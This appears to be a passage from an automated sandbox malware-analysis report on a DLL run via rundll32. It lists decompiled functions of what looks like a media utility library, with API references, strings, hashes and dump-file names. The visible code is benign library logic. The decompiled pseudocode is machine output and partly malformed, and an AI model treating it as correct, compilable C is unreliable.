							if(_t37 >= 0) {
								continue;
							} else {
								_v52 =  &_v32;
								L6:
								_v48 = _t37;
								_v76 = _a4;
								_v84 = "Error setting option %s to value %s.\n";
								_v88 = 0x10;
								 *_t56 = _t53;
								_v80 =  *_t54;
								L10023A40();
								 *_t56 = _v52;
								L10011CC0();
								return _v48;
							}
						}
						goto L11;
					}
					 *_t56 = _t45;
					L10011CC0();
					 *_t45 = _v32;
					goto L10;
				}
				L11:
			}

0x1002d666
0x1002d669
0x1002d66d
0x1002d671
0x1002d675
0x1002d67b
0x1002d76e
0x1002d777
0x1002d681
0x1002d681
0x1002d690
0x1002d690
0x1002d69e
0x1002d6a2
0x1002d6a8
0x1002d6ab
0x1002d6b2
0x1002d6b4
0x00000000
0x00000000
0x1002d6ba
0x1002d6c1
0x1002d6c8
0x1002d6cb
0x1002d6cf
0x1002d6d9
0x1002d732
0x1002d739
0x1002d740
0x1002d744
0x1002d748
0x1002d74b
0x1002d74f
0x1002d756
0x00000000
0x1002d75c
0x00000000
0x1002d75c
0x1002d6db
0x1002d6dd
0x00000000
0x1002d6df
0x1002d6e3
0x1002d6e7
0x1002d6e7
0x1002d6f3
0x1002d6ff
0x1002d703
0x1002d707
0x1002d70a
0x1002d70e
0x1002d717
0x1002d71a
0x1002d72a
0x1002d72a
0x1002d6dd
0x00000000
0x1002d6d9
0x1002d760
0x1002d763
0x1002d76c
0x00000000
0x1002d76c
0x00000000

APIs

mv_dict_get.MAIN ref: 1002D6AB
mv_opt_set.MAIN ref: 1002D6CF
mv_log.MAIN ref: 1002D70E
mv_dict_free.MAIN ref: 1002D71A
mv_dict_set.MAIN ref: 1002D74F
mv_dict_free.MAIN ref: 1002D763

Strings

Error setting option %s to value %s., xrefs: 1002D6F7

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_dict_free$mv_dict_getmv_dict_setmv_logmv_opt_set
String ID: Error setting option %s to value %s.
API String ID: 3258142065-3279051434
Opcode ID: ef5084decda187cd213080217201cfa49cd5edc4dfbb471ff57d75f3a90a4203
Instruction ID: 35dba755cf83891b6b787024823c04eb56a84bd00f467e741874e99c9612048c
Opcode Fuzzy Hash: ef5084decda187cd213080217201cfa49cd5edc4dfbb471ff57d75f3a90a4203
Instruction Fuzzy Hash: F731A3B9A087449FC740DF69D58065ABBE4FF88294F51882EF99CC7310E674E940DF82

Uniqueness

Uniqueness Score: -1.00%

Function 1004A02B Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32 ref: 1004A08E
SleepConditionVariableSRW.KERNEL32 ref: 1004A0C6
ReleaseSRWLockExclusive.KERNEL32 ref: 1004A0DC
AcquireSRWLockExclusive.KERNEL32 ref: 1004A123
WakeConditionVariable.KERNEL32 ref: 1004A135
ReleaseSRWLockExclusive.KERNEL32 ref: 1004A141
mv_log.MAIN ref: 1004A1E7
abort.MSVCRT ref: 1004A1EC

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionReleaseVariable$SleepWakeabortmv_log
String ID:
API String ID: 347658250-0
Opcode ID: 5fa1784df7e6f5e9cb7a8772d34de868a2265032091343187e4fb7fffa3ef144
Instruction ID: fe769e6f261b0c0b4b117e343d60818024885dfb85fec5dec2932d96265b7c30
Opcode Fuzzy Hash: 5fa1784df7e6f5e9cb7a8772d34de868a2265032091343187e4fb7fffa3ef144
Instruction Fuzzy Hash: 7B5136B5604B058FD720EF29C58020BFBE1FF89354F118A2DE99A97610E774F949CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10002670 Relevance: 12.1, APIs: 8, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E10002670(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t44;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				intOrPtr* _t54;
				signed int _t55;
				signed int _t65;
				void* _t66;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				void* _t71;
				signed int* _t72;

				_t72 = _t71 - 0x3c;
				_t72[4] = 1;
				_t69 = _t72[0x14];
				_t52 = _t72[0x15];
				_t72[2] = _t72[0x16];
				_t72[3] = _t69;
				_t72[1] = _t52;
				 *_t72 =  &(_t72[0xb]);
				if(E1003A070(_t52, __edx, 1, _t66) < 0) {
					L14:
					return 0;
				} else {
					 *_t72 = 0x1c;
					_t39 = E100265E0();
					_t65 = _t39;
					if(_t39 == 0) {
						goto L14;
					} else {
						 *(_t39 + 0x10) = _t52;
						 *(_t39 + 0x14) = _t69;
						asm("cdq");
						 *(_t65 + 0x18) = _t72[0xb] / _t72[0x16];
						 *_t72 = _t69;
						E1003A050();
						_t53 =  ==  ? 1 : _t52;
						 *(_t65 + 4) = _t53;
						_t72[1] = 4;
						 *_t72 = _t53;
						_t44 = E100266D0();
						 *_t65 = _t44;
						if(_t44 == 0) {
							L13:
							 *_t72 = _t65;
							L100265B0();
							goto L14;
						} else {
							_t70 = 0;
							if( *(_t65 + 4) > 0) {
								while(1) {
									_t68 = _t70 * 4;
									_t72[2] = 0;
									_t54 = _t44 + _t68;
									_t72[1] = 1;
									 *_t72 = _t72[0xb];
									 *_t54 = L10017E40(_t54, _t65, _t68);
									_t44 =  *_t65;
									if( *((intOrPtr*)(_t44 + _t68)) == 0) {
										break;
									}
									_t70 = _t70 + 1;
									if( *(_t65 + 4) <= _t70) {
										goto L15;
									} else {
										continue;
									}
									goto L16;
								}
								if(_t44 != 0) {
									if( *(_t65 + 4) > 0) {
										_t55 = 0;
										while(1) {
											_t50 = _t44 + _t55 * 4;
											_t55 = _t55 + 1;
											 *_t72 = _t50;
											L10018950(_t55);
											if(_t55 >=  *(_t65 + 4)) {
												goto L12;
											}
											_t44 =  *_t65;
										}
									}
									L12:
									 *_t72 = _t65;
									E100265C0();
								}
								goto L13;
							} else {
								L15:
								 *(_t65 + 0xc) = _t72[0x16];
								return _t65;
							}
						}
					}
				}
				L16:
			}

0x10002679
0x10002680
0x10002684
0x10002688
0x1000268c
0x10002694
0x10002698
0x1000269c
0x100026a6
0x1000277b
0x10002786
0x100026ac
0x100026ac
0x100026b3
0x100026ba
0x100026bc
0x00000000
0x100026c2
0x100026c2
0x100026ca
0x100026d1
0x100026d6
0x100026d9
0x100026dc
0x100026e8
0x100026eb
0x100026ee
0x100026f2
0x100026f5
0x100026fa
0x100026fe
0x10002773
0x10002773
0x10002776
0x00000000
0x10002700
0x10002703
0x10002707
0x10002716
0x10002716
0x1000271f
0x10002723
0x1000272b
0x10002733
0x1000273b
0x1000273d
0x10002744
0x00000000
0x00000000
0x10002710
0x10002714
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10002714
0x10002748
0x1000274f
0x10002751
0x1000275a
0x1000275a
0x1000275d
0x1000275e
0x10002761
0x10002769
0x00000000
0x00000000
0x10002758
0x10002758
0x1000275a
0x1000276b
0x1000276b
0x1000276e
0x1000276e
0x00000000
0x10002709
0x10002790
0x10002794
0x100027a0
0x100027a0
0x10002707
0x100026fe
0x100026bc
0x00000000

APIs

mv_samples_get_buffer_size.MAIN ref: 1000269F
mv_mallocz.MAIN ref: 100026B3
mv_sample_fmt_is_planar.MAIN(?), ref: 100026DC
mv_calloc.MAIN(?), ref: 100026F5
mv_fifo_alloc2.MAIN(?), ref: 10002736
mv_fifo_freep2.MAIN(?), ref: 10002761
mv_freep.MAIN(?), ref: 1000276E

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_callocmv_fifo_alloc2mv_fifo_freep2mv_freepmv_malloczmv_sample_fmt_is_planarmv_samples_get_buffer_size
String ID:
API String ID: 3721653357-0
Opcode ID: 42dff5a3eb04adc49f19050df871efb01a7c87c8a448b2921b037ed844c736a9
Instruction ID: bb9eb3e5d0204011adfe0aa4748bc2d8f300a22c96b3cf74cba0d42d24462043
Opcode Fuzzy Hash: 42dff5a3eb04adc49f19050df871efb01a7c87c8a448b2921b037ed844c736a9
Instruction Fuzzy Hash: 273148B8A087068FD700DF69C58061AFBE4FF88384F11892EE99CC7315E774E8558B92

Uniqueness

Uniqueness Score: -1.00%

Function 1001D220 Relevance: 12.1, APIs: 8, Instructions: 71COMMON

Download Yara Rule

APIs

mv_mallocz.MAIN ref: 1001D230
mv_sha512_alloc.MAIN ref: 1001D273
mv_sha512_alloc.MAIN ref: 1001D2BB
mv_md5_alloc.MAIN ref: 1001D2EB
mv_sha_alloc.MAIN ref: 1001D31B
mv_sha_alloc.MAIN ref: 1001D34B
mv_sha_alloc.MAIN ref: 1001D37B

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_sha_alloc$mv_sha512_alloc$mv_malloczmv_md5_alloc
String ID:
API String ID: 1780169607-0
Opcode ID: 89fe73e6439e83052310f9247eaea9b5c1dd9965fdfc5345831e5e410a5014f8
Instruction ID: 308d306f19edf6ed78ffa685c28ceabba911b28968eaf46d4c5fb4499698521b
Opcode Fuzzy Hash: 89fe73e6439e83052310f9247eaea9b5c1dd9965fdfc5345831e5e410a5014f8
Instruction Fuzzy Hash: 543102B0016390CFD740EF50E549B06BBA0FB00315FA6C9A9C50A1F262D7BED944CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 10020660 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

mv_pix_fmt_desc_get.MAIN ref: 1002067F
mv_image_get_linesize.MAIN ref: 100206B4

Part of subcall function 1001E960: mv_pix_fmt_desc_get.MAIN(?,?,?,?,?,?,?,?,?,?,00000000,?,100B3560,00000000,1001F6E8), ref: 1001E976

mv_image_fill_linesizes.MAIN(?), ref: 10020748
mv_image_fill_plane_sizes.MAIN(?), ref: 100207AB

Strings

Picture size %ux%u is invalid, xrefs: 100207FF

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_pix_fmt_desc_get$mv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_get_linesize
String ID: Picture size %ux%u is invalid
API String ID: 3680373976-1963597007
Opcode ID: 363d7f5b0f2576a8b82a55742b866563a56274ce2c15312feba007e7f86faec8
Instruction ID: 2314817fb5d2ccefc3c8ff58fcc714fc26626ca1613a84a068ef5f43893ec408
Opcode Fuzzy Hash: 363d7f5b0f2576a8b82a55742b866563a56274ce2c15312feba007e7f86faec8
Instruction Fuzzy Hash: C4512576A083418FC354CF69D88564FBBE6EFC8350F558A2EF598C7351EA74E8448B42

Uniqueness

Uniqueness Score: -1.00%

Function 100121A0 Relevance: 10.6, APIs: 7, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E100121A0(intOrPtr* _a4, signed int* _a8, char _a12, char _a16) {
				char _v1052;
				char _v1053;
				char _v1054;
				char _v1055;
				char _v1072;
				char _v1076;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				signed int* _v1112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t41;
				signed int _t43;
				signed int _t47;
				void* _t62;
				char* _t63;
				intOrPtr* _t65;
				char _t67;
				signed int* _t71;
				void* _t72;
				intOrPtr* _t74;
				void* _t77;
				char* _t78;
				intOrPtr* _t79;

				_t79 =  &_v1100;
				_t71 = _a8;
				_t41 = _a12;
				_v1053 = 0;
				_t67 = _a16;
				_t74 = _a4;
				_v1072 = _t41;
				_v1076 = _t67;
				_v1055 = _t67;
				_v1054 = _t41;
				if(_t71 == 0 || _t67 == 0 || _t41 == 0 || _t67 == _t41 || _t67 == 0x5c || _t41 == 0x5c) {
					return 0xffffffea;
				}
				if(_t74 == 0 ||  *_t74 == 0) {
					 *_t79 = 0x100b1205;
					_t43 = E100267C0(_t62, _t71, _t74, _t77);
					 *_t71 = _t43;
					asm("sbb eax, eax");
					return _t43 & 0xfffffff4;
				}
				_v1108 = 0xffffffff;
				_t63 =  &_v1052;
				_v1112 = 0x40;
				_t78 =  &_v1055;
				 *_t79 = _t63;
				E10008880(_t63, _t71, _t74, _t78);
				_t47 = 0;
				_t65 = _t74;
				_a8 = _t71;
				_t72 = 0;
				if( *_t65 > 0) {
					while(1) {
						_t74 =  *((intOrPtr*)(_t65 + 4)) + _t47 * 8;
						if(_t74 == 0) {
							goto L14;
						}
						if(_t72 != 0) {
							 *_t79 = _t63;
							_v1108 = 1;
							_v1112 =  &_v1076;
							_a4 = _t65;
							L10008F30();
							_t65 = _a4;
						}
						_v1108 = _t78;
						_v1104 = 1;
						_t72 = _t72 + 1;
						_v1100 = 0;
						_a4 = _t65;
						 *_t79 = _t63;
						_v1112 =  *_t74;
						E10009730();
						_v1108 = 1;
						_v1112 =  &_v1072;
						 *_t79 = _t63;
						L10008F30();
						_v1100 = 0;
						_v1104 = 1;
						_v1108 = _t78;
						 *_t79 = _t63;
						_v1112 =  *((intOrPtr*)(_t74 + 4));
						E10009730();
						_t65 = _a4;
						_t47 = _t74 + 1;
						if( *_t65 > _t47) {
							continue;
						}
						goto L14;
					}
				}
				L14:
				 *_t79 = _t63;
				_v1112 = _a8;
				return E10009690(_t63, _t65, _a8, _t74);
			}

0x100121a4
0x100121aa
0x100121b1
0x100121b8
0x100121bd
0x100121c4
0x100121cd
0x100121d1
0x100121d5
0x100121d9
0x100121dd
0x00000000
0x10012360
0x10012210
0x10012218
0x1001221f
0x10012224
0x10012229
0x00000000
0x1001222b
0x1001224a
0x1001224e
0x10012252
0x10012256
0x1001225a
0x1001225d
0x10012262
0x10012264
0x10012266
0x10012271
0x10012273
0x10012279
0x1001227c
0x10012281
0x00000000
0x00000000
0x10012289
0x10012330
0x10012338
0x10012340
0x10012344
0x1001234b
0x10012350
0x10012350
0x1001228f
0x1001229a
0x1001229e
0x1001229f
0x100122a3
0x100122ac
0x100122af
0x100122b3
0x100122c1
0x100122c5
0x100122c9
0x100122cc
0x100122d3
0x100122dc
0x100122e0
0x100122e7
0x100122ea
0x100122ee
0x100122f3
0x10012302
0x10012307
0x00000000
0x00000000
0x00000000
0x10012307
0x10012279
0x1001230d
0x1001230d
0x10012317
0x1001232a

APIs

mv_strdup.MAIN ref: 1001221F
mv_bprint_init.MAIN ref: 1001225D
mv_bprint_escape.MAIN ref: 100122B3
mv_bprint_append_data.MAIN ref: 100122CC
mv_bprint_escape.MAIN ref: 100122EE
mv_bprint_finalize.MAIN ref: 1001231B

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_escape$mv_bprint_append_datamv_bprint_finalizemv_bprint_initmv_strdup
String ID:
API String ID: 806756221-0
Opcode ID: bd899ef9b0dbaba746c8b6d0da506afdd114f8397f9f9c4fb8b0c4949863bb04
Instruction ID: 7187b0243939ecc75a9d4dff51427cd59bf1c299843c139242dac8f39c04a417
Opcode Fuzzy Hash: bd899ef9b0dbaba746c8b6d0da506afdd114f8397f9f9c4fb8b0c4949863bb04
Instruction Fuzzy Hash: 134114B55093449FC360CF28C08029BFBE5FF86354F55892EE9988B341E736EA95CB46

Uniqueness

Uniqueness Score: -1.00%

Function 1002C706 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 100COMMON

Download Yara Rule

APIs

mv_expr_parse_and_eval.MAIN ref: 1002C5F5

Strings

all, xrefs: 1002C56F
max, xrefs: 1002C505
default, xrefs: 1002C4D2
none, xrefs: 1002C54A
min, xrefs: 1002C51F

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_expr_parse_and_eval
String ID: all$default$max$min$none
API String ID: 2217327432-3292705889
Opcode ID: e2d7b0edeec2b1870f040b64e547b800b90d05965a24d8d30024c1e278e1b004
Instruction ID: 83d07ffb6d8c6cfe48df1192a88470446e278d9b2bcb376e76410f15be41486f
Opcode Fuzzy Hash: e2d7b0edeec2b1870f040b64e547b800b90d05965a24d8d30024c1e278e1b004
Instruction Fuzzy Hash: A6410475A097458BC395EF28E04038BBBE5FFC9314F618A2EE9C9D7200EB71D9448B42

Uniqueness

Uniqueness Score: -1.00%

Function 1002931B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 100292C3
mv_log.MAIN ref: 100292ED
mv_log.MAIN ref: 10029355
mv_log.MAIN ref: 10029373
mv_log.MAIN ref: 10029391

Strings

%-15s , xrefs: 100292D4

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log$strcmp
String ID: %-15s
API String ID: 1163046698-755444208
Opcode ID: 8817496acbf438144a82c63c68a2b26bf455b6893397366e45a129ce34d41058
Instruction ID: c2e3231857e14b6d66286021a66802d314ea6e9fac30e20b35dba61e0b599c78
Opcode Fuzzy Hash: 8817496acbf438144a82c63c68a2b26bf455b6893397366e45a129ce34d41058
Instruction Fuzzy Hash: 39319E78A093459FC750DF28E19065EBBE1EF88B80F91C82EF89987351E774E9409B42

Uniqueness

Uniqueness Score: -1.00%

Function 1008F820 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 1008F832
_errno.MSVCRT ref: 1008F850
rand.MSVCRT ref: 1008F8B0
_sopen.MSVCRT ref: 1008F8F6
_errno.MSVCRT ref: 1008F904

Strings

XXXX, xrefs: 1008F848

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _errno$_sopenrandstrlen
String ID: XXXX
API String ID: 1081397658-1518373315
Opcode ID: 41818ad3e72adebc80571ed86afad46c9302ef0646f7f912c4873975d3c77747
Instruction ID: 44b3c0712c4d6cf3a6541ef21b7e2c07706476ce399c25bdb07493ab5c095def
Opcode Fuzzy Hash: 41818ad3e72adebc80571ed86afad46c9302ef0646f7f912c4873975d3c77747
Instruction Fuzzy Hash: CA21F571D0834ACFC318EF35889416A7BE0FF8A354F12892FE6548B291DF319949CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1001D7A0 Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

mv_buffer_pool_uninit.MAIN ref: 1001D7BB

Part of subcall function 1000A650: AcquireSRWLockExclusive.KERNEL32 ref: 1000A66C
Part of subcall function 1000A650: mv_freep.MAIN ref: 1000A69C
Part of subcall function 1000A650: ReleaseSRWLockExclusive.KERNEL32 ref: 1000A6AB

mv_buffer_unref.MAIN ref: 1001D7F2
mv_buffer_unref.MAIN ref: 1001D801
mv_freep.MAIN ref: 1001D810
mv_freep.MAIN ref: 1001D822
mv_freep.MAIN ref: 1001D831
mv_freep.MAIN ref: 1001D83D

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep$ExclusiveLockmv_buffer_unref$AcquireReleasemv_buffer_pool_uninit
String ID:
API String ID: 3286761627-0
Opcode ID: c6c09d7d300876a1707853c3afdde09c35c9359a08c94a7bfa9ac57c73ae979d
Instruction ID: d019eb9eba46684987302df58934bd10d6a5c0a39701eb176e19b0f551cd46b2
Opcode Fuzzy Hash: c6c09d7d300876a1707853c3afdde09c35c9359a08c94a7bfa9ac57c73ae979d
Instruction Fuzzy Hash: FE1198B86087018FDB04EF69D485A1EFBE1FF84204F46895DE4948B306E735E889CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1000C220 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E1000C220() {
				char* _t55;
				void* _t57;
				void* _t59;
				void* _t63;
				unsigned int _t64;
				signed char _t66;
				void* _t67;
				unsigned int _t72;
				unsigned int _t73;
				void* _t75;
				intOrPtr _t77;
				void* _t81;
				int _t82;
				signed int _t83;
				intOrPtr _t88;
				void* _t92;
				int _t95;
				signed int _t96;
				void* _t103;
				void* _t104;
				void* _t107;
				void* _t113;
				void* _t116;
				void** _t119;
				void* _t122;
				intOrPtr* _t123;
				void** _t125;

				_t123 = _t122 - 0x1c;
				_t77 =  *((intOrPtr*)(_t123 + 0x20));
				_t88 =  *((intOrPtr*)(_t123 + 0x24)) - 0x400;
